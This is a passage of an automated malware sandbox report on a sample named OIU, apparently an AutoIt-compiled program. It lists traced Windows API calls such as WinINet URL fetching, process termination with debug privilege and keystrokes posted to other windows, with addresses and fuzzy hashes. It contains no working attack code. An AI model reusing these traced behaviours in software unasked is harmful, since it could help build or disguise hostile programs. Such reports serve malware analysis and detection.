                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C1C2CA
                                                                      • GetLastError.KERNEL32 ref: 00C1C322
                                                                      • SetEvent.KERNEL32(?), ref: 00C1C336
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C1C341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BE3AAF,?,?,Bad directive syntax error,00C3CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C098BC
                                                                      • LoadStringW.USER32(00000000,?,00BE3AAF,?), ref: 00C098C3
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • MessageBoxW.USER32 ref: 00C09987
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 858772685-4153970271
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetParent.USER32 ref: 00C020AB
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00C020C0
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C0214D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 1290815626-3381328864

                                                                      APIs
                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00C35186
                                                                      • ShowWindow.USER32(?,00000000), ref: 00C351C7
                                                                      • ShowWindow.USER32(?,00000005), ref: 00C351CD
                                                                      • SetFocus.USER32 ref: 00C351D1
                                                                        • Part of subcall function 00C36FBA: DeleteObject.GDI32(00000000), ref: 00C36FE6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C3520D
                                                                      • SetWindowLongW.USER32 ref: 00C3521A
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00C3524D
                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00C35287
                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00C35296
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0

                                                                      APIs
                                                                      • LoadImageW.USER32 ref: 00BF6890
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00BF68A9
                                                                      • LoadImageW.USER32 ref: 00BF68B9
                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00BF68D1
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BF68F2
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00BF6901
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BF691E
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00BF692D
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID:
                                                                      • API String ID: 1268354404-0

                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1C182
                                                                      • GetLastError.KERNEL32 ref: 00C1C195
                                                                      • SetEvent.KERNEL32(?), ref: 00C1C1A9
                                                                        • Part of subcall function 00C1C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C1C272
                                                                        • Part of subcall function 00C1C253: GetLastError.KERNEL32 ref: 00C1C322
                                                                        • Part of subcall function 00C1C253: SetEvent.KERNEL32(?), ref: 00C1C336
                                                                        • Part of subcall function 00C1C253: InternetCloseHandle.WININET(00000000), ref: 00C1C341
                                                                      Similarity
                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 337547030-0

                                                                      APIs
                                                                        • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                                        • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A5E
                                                                        • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00C03A65
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C025BD
                                                                      • PostMessageW.USER32 ref: 00C025DB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C025DF
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C025E9
                                                                      • PostMessageW.USER32 ref: 00C02601
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C02605
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C0260F
                                                                      • PostMessageW.USER32 ref: 00C02623
                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C02627
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C01449,?,?,00000000), ref: 00C0180C
                                                                      • HeapAlloc.KERNEL32(00000000,?,00C01449,?,?,00000000), ref: 00C01813
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01449,?,?,00000000), ref: 00C01828
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00C01449,?,?,00000000), ref: 00C01830
                                                                      • DuplicateHandle.KERNEL32 ref: 00C01833
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01449,?,?,00000000), ref: 00C01843
                                                                      • GetCurrentProcess.KERNEL32(00C01449,00000000,?,00C01449,?,?,00000000), ref: 00C0184B
                                                                      • DuplicateHandle.KERNEL32 ref: 00C0184E
                                                                      • CreateThread.KERNEL32(00000000,00000000,00C01874,00000000,00000000,00000000), ref: 00C01868
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0

                                                                      APIs
                                                                        • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                                      • GetMenuItemInfoW.USER32 ref: 00C0C6EE
                                                                      • _wcslen.LIBCMT ref: 00C0C735
                                                                      • SetMenuItemInfoW.USER32 ref: 00C0C79C
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C0C7CA
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                      • String ID: 0$x`$x`
                                                                      • API String ID: 1227352736-927836491

                                                                      APIs
                                                                        • Part of subcall function 00C0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C0D501
                                                                        • Part of subcall function 00C0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C0D50F
                                                                        • Part of subcall function 00C0D4DC: CloseHandle.KERNEL32(00000000), ref: 00C0D5DC
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2A16D
                                                                      • GetLastError.KERNEL32 ref: 00C2A180
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2A1B3
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C2A268
                                                                      • GetLastError.KERNEL32(00000000), ref: 00C2A273
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2A2C4
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425

                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C33925
                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C3393A
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C33954
                                                                      • _wcslen.LIBCMT ref: 00C33999
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C339C6
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C339F4
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcslen
                                                                      • String ID: SysListView32
                                                                      • API String ID: 2147712094-78025650
                                                                      • Opcode ID: 5f2acf0338083346679d402527c935b5f0e3a243a7e6b586c8c4dfff32307ba1
                                                                      • Instruction ID: 5f8de08b4c8f9d5369882384cd686e0e0613b2f81c97c99417f86c1425ea3b94
                                                                      • Opcode Fuzzy Hash: 5f2acf0338083346679d402527c935b5f0e3a243a7e6b586c8c4dfff32307ba1
                                                                      • Instruction Fuzzy Hash: B341A271A10358ABEB219F64CC49FEE77A9EF08350F140566F958E7281D7719A80CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: f11daf9fe25d67657320b8f4825a356efb748a9e8e80335aae9715d58a05e6e1
                                                                      • Instruction ID: 872879ab4180d8a3c65eeebec9937cfa2c0aacb40b2a0dff6a58136f16b22063
                                                                      • Opcode Fuzzy Hash: f11daf9fe25d67657320b8f4825a356efb748a9e8e80335aae9715d58a05e6e1
                                                                      • Instruction Fuzzy Hash: B2113A32689306BAE7149B149CC3EAE37DCDF15715F20423EF904A62C2E7B09F009268
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 952045576-0
                                                                      • Opcode ID: 57748cc3be02c37fa48cdd0eef28d6457c7c1fec482ac9dea566125d13a64f03
                                                                      • Instruction ID: e74766a4bbe17c79024f64d9dfc7a1eb7de6d35cf1cf71a6b7ffac112478f028
                                                                      • Opcode Fuzzy Hash: 57748cc3be02c37fa48cdd0eef28d6457c7c1fec482ac9dea566125d13a64f03
                                                                      • Instruction Fuzzy Hash: 45419265C1021875CB11EBF4C88AEDFB7E8AF45710F5088AAE528E3161FB34E755C3A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00BBF953
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006), ref: 00BFF3D1
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00BFF454
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: 19c3a5131cab2e99045c422cff9c29a376279b03b510501c5e52b09a99f2edbe
                                                                      • Instruction ID: c4729fdd6e982c54826d47325259358d8c59b5962af019d005f1069eb194cfcb
                                                                      • Opcode Fuzzy Hash: 19c3a5131cab2e99045c422cff9c29a376279b03b510501c5e52b09a99f2edbe
                                                                      • Instruction Fuzzy Hash: 1941D131618682BBC7398B298CC87BE7BD2EF56314F1444BCE5C663660C6B2E884DB11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00C32D1B
                                                                      • GetDC.USER32(00000000), ref: 00C32D23
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C32D2E
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00C32D3A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C32D76
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C32D87
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C32DC2
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C32DE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: 99cd2faa21060d25f366d367d9f4bf6dd2411d7132f23bde18177cc9705a7025
                                                                      • Instruction ID: 31b6261eee0d0d822aabf925e3bada44ca674d44cc2840e4f167ce5f724c925c
                                                                      • Opcode Fuzzy Hash: 99cd2faa21060d25f366d367d9f4bf6dd2411d7132f23bde18177cc9705a7025
                                                                      • Instruction Fuzzy Hash: 6C317C72221214BFEF218F50CC8AFEF3BA9EF09715F044055FE08AA291C6759C50CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 55abef86493cfca93f0e4d0e26990acafdda22f1df15020e786e977237f075ff
                                                                      • Instruction ID: 0e0e51fd9415383db205f976afe1ce0d1aab85cbedaf7a5e969b43b3f7a9985e
                                                                      • Opcode Fuzzy Hash: 55abef86493cfca93f0e4d0e26990acafdda22f1df15020e786e977237f075ff
                                                                      • Instruction Fuzzy Hash: D321DA61A50A09B7D31459159E82FBB339CEF61388F440438FD156A7C2F722EE11CDA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: dba97887acf9b99850cf5ed6ce1b17f179a6b1a2e0bba720480ffcc0267bd507
                                                                      • Instruction ID: 0e189781317020aa115ecfd1aee7172217ba0e17408f8f714a2675da2399b822
                                                                      • Opcode Fuzzy Hash: dba97887acf9b99850cf5ed6ce1b17f179a6b1a2e0bba720480ffcc0267bd507
                                                                      • Instruction Fuzzy Hash: F5D1D271A0062A9FDF10CFA8D880BAEB7B5FF48344F148069E925AB690D770DE41CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00BE15CE
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE1651
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00BE17FB,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE16E4
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE16FB
                                                                        • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE1777
                                                                      • __freea.LIBCMT ref: 00BE17A2
                                                                      • __freea.LIBCMT ref: 00BE17AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                      • String ID:
                                                                      • API String ID: 2829977744-0
                                                                      • Opcode ID: 9798bf93bf42f6c56788802e8f5ae85e24a97d12054abc5b47455e1444fd9114
                                                                      • Instruction ID: 884f689c7cfdc4124126ce3f8af008d29f15bd189863d0e9900f84f949d1b2a5
                                                                      • Opcode Fuzzy Hash: 9798bf93bf42f6c56788802e8f5ae85e24a97d12054abc5b47455e1444fd9114
                                                                      • Instruction Fuzzy Hash: 0D91A4B1E102969EDB208F7AC881EEEBBF5EF59710F284A99E812E7141D735DD40C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2610073882-625585964
                                                                      • Opcode ID: 12de4954a60d0aaeefef1160dcb01b79b295797f7055eaee138230e9e25a0bf1
                                                                      • Instruction ID: b8148b542e4f29d9486c804ff52910afd6125c426bf15db2828104e75e2f9e98
                                                                      • Opcode Fuzzy Hash: 12de4954a60d0aaeefef1160dcb01b79b295797f7055eaee138230e9e25a0bf1
                                                                      • Instruction Fuzzy Hash: BE918471A00225AFDF24CFA5DC84FAEBBB8EF46B14F108559F525AB280D7709945CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C1125C
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C11284
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C112A8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C112D8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C1135F
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C113C4
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C11430
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      • Opcode ID: e7778db587fb4478eb051814c46052705129e0aa636838b015ac1dcb9c91a1a0
                                                                      • Instruction ID: 4179aa64dee31607349ad856738b32bf37165cd2b4fcd80a86ada50d9c580290
                                                                      • Opcode Fuzzy Hash: e7778db587fb4478eb051814c46052705129e0aa636838b015ac1dcb9c91a1a0
                                                                      • Instruction Fuzzy Hash: 22910471A00219AFDB00DF94D884BFEB7F5FF46710F184029EA11E7291D778A981EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
